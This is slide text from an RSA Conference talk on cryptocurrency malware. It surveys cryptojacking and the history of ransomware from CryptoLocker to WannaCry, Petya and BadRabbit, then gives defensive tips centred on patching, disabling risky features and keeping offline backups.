#RSAC

SESSION ID: SEM-W02G

CRYPTOCURRENCY MALWARE

Laurence Pitt Director, Security Strategy Juniper Networks @LAURENCEPITT Our discussion today #RSAC

1. What is cryptocurrency 2. Ransomware history 3. Cryptojacking 4. Tips to avoid cryptocurrency malware 5. Conclusions What is Cryptocurrency Malware #RSAC

Any malware that uses or mines crypto coins. For example: crypto ransomware and miner trojans. Bitcoin Primer #RSAC

• easy to use, • fast, • publicly available, • decentralized, • anonymity serves to encourage extortion. Bitcoin up 10x in a year — and highly adopted #RSAC

Value shift during 2017 Number of Bitcoin Wallets

Source: Blockchain.info Mining Bitcoin

China, Japan, Iceland, Georgia, Sweden #RSAC Ethereum vs Bitcoin

Oil vs Gold #RSAC Anonymity #RSAC

o Mixer o Private coin Cryptojacking

CoinHive #RSAC

2 1 Threat actor

Compromised Website with Cryptomining script embedded 3 End-users

3 4

Cryptocurrency mining STEPS 1. The threat actor compromises a website 2. Users connect to the compromised website and the cryptomining script executes 3. Users unknowingly start mining cryptocurrency on behalf of the threat actor 4. Upon successfully adding a new block to the blockchain, the threat actor receives a reward in cryptocurrency coins #RSAC Cryptojacking #RSAC Defense

o CryptoJackingTest.com o NoCoin o MinerBlock o AdBlock o NoScript Prediction #4

#RSAC More IOTCRYPTO (Internet RANSOMWARE Of Things) security incidents RANSOMWARE ATTACK EVERY 40 SECONDS Source: Kaspersky Security Bulletin 5.99bn RANSOMWARE ATTACKS 1H/18 Source: Sonicwall annual Cyber Threat Report 2018 Asymmetric encryption #RSAC The ransomware business model #RSAC

90% of people do not backup daily Data theft in place Extortion Focus on ease of use to drive conversion Currently 50% pay the ransom, up from 41% 2 years ago The ransomware business model #RSAC

Locked Files Bitcoin Ransom Sent C&C Server

Unlocked Files Private Key Sent 38% of businesses hit in 2017 #RSAC Costs of ransomware #RSAC

2015: $24,000,000

2016: $1,000,000,000

2017: $5,000,000,000 Additional Costs #RSAC

Network mitigation Network countermeasures Loss of productivity Legal fees IT services Purchase of credit monitoring services for employees or customers Potential harm to an organization’s reputation Ransomware Timeline #RSAC

Endgame What is Cryptolocker? #RSAC

Began September 2013 Encrypts victim’s files, asks for $300 ransom Impossible to recover files without a key Ransom increases after deadline Goal is monetary via Bitcoin 250,000+ victims worldwide Cryptodefense aka Cryptowall #RSAC

Cryptodefense was the next version of Cryptolocker appeared in Feb 2014 no GUI pops up a webpage, drops text file Uses TOR for anonymous payemens … And as it makes it harder to track Locky #RSAC

2016 Installed by Dridex gang Word documents with macros over email Used JavaScript, Powershell Over 400,000 victims in hours Keranger #RSAC First Ransomware on OSX

Appeared in March 2016 1BTC – $400 at the time Signed software! Uses an Infected Transmission BitTorrent client installer IOT – Smart TV Ransomware #RSAC aka Frantic Locker

Flocker Ransomware infects Smart TVs Locks the screen and demands $200 in iTunes gift cards IOT Thermostat Ransomware

DEFCON Proof of Concept #RSAC

Locks temperature at 99 degrees until the owner pays the ransom to obtain a PIN which would unlock it CryptoShuffler #RSAC

Stolen 23 bitcoins so far Attacks Dogecoin, Litecoin, Dash, Ethereum, Monero, and Zcash Watches the user's clipboard and replaces any string that looks like a Bitcoin wallet with the attackers' address Ransomware has PEAKED

Or has it… #RSAC WANNACRY

The new peak for ransomware #RSAC

Group linked to North Korea launched a global ransom worm. Same group hacked Sony.

For the first time, ransomware payload was merged with NSA developed SMB exploit. It infected 2.3 Million computers quickly. Accidental Kill Switch #RSAC www.iuqerfsodp9ifjaposdfjhg osurijfaewrwergwea.com

If the connection succeeds, the binary exits.

Most likely an anti-sandbox technique. Damages Estimated at $4 Billion Dollars #RSAC PETYA (June 2017) #RSAC

Russia attacked Ukraine via a malware wiper disguised as ransomware.

Unusual attack as the goal of Petya was disruption of infrastructure.

Seeded via MeDoc accounting software is mandated for tax reporting by the Ukrainian government. BADRABBIT #RSAC

• BadRabbit hit on Oct 24, 2017

• Seeded via compromised websites that offered a bogus update to Adobe Flash software.

• Believed to be from the same actor (Telebots) who wrote Petya.

• 200+ victims in Eastern Europe FACEX Worm #RSAC o Discovered in May 2018 o Malicious Chrome extension o Spreads via Facebook messenger links o Hijacks bitcoin transactions o Hijacks Coinhive and other cryptocurrency websites Tips to avoid Ransomware #RSAC

Install the latest patches for your software, especially Adobe, Microsoft and Oracle Use network traffic monitoring Use a comprehensive endpoint security solution with behavioral detection Turn Windows User Access Control on Block Macros Disable Windows Management Instrumentation (WMI) service Tips to avoid Ransomware #RSAC

Be skeptical: Don’t click on anything suspicious Block popups and use an ad-blocker Override your browser’s user-agent* Consider Microsoft Office viewers Disable Windows Script Host Disable SMBv1 Windows tips to avoid Ransomware #RSAC

Disable Autoplay Enable UAC Windows 10 – Controlled Folders #RSAC

Prevents unauthorized apps from modifying files in protected folders In Windows 10 version 1709, aka "Redstone 3" On a mac - RansomWhere #RSAC Tips to Avoid Losing Data to Ransomware #RSAC

Identify Ransomware and look for a decryptor:

https://id-ransomware.malwarehunterteam.com/

Shadow Copies Turn off computer at first signs of infection Remember: the only effective ransomware defense is backup List of decryptors #RSAC

http://bit.ly/decryptors Conclusions #RSAC

1. Ransomware has evolved into a major threat allowing criminals to easily monetize malware via Bitcoin, Monero, Zcash

2. Every platform is vulnerable to ransomware

3. Backup your files! Since decrypting files is not always possible frequent backups become even more critical. And keep your backups offline How can I apply this to my business? #RSAC

What should you do next? Ensure that you educate the workforce on the dangers of cryptocurrency malware attacks. The best prevention is awareness. In the short-term you need to Make sure that systems run up-to-date antimalware solutions Backups are CRITICAL should ransomware hit. Review existing plan. Ongoing and for the future Watch the news, tense geopolitical situations can signal attacks Assume that the bad-guys are watching and monitoring.

42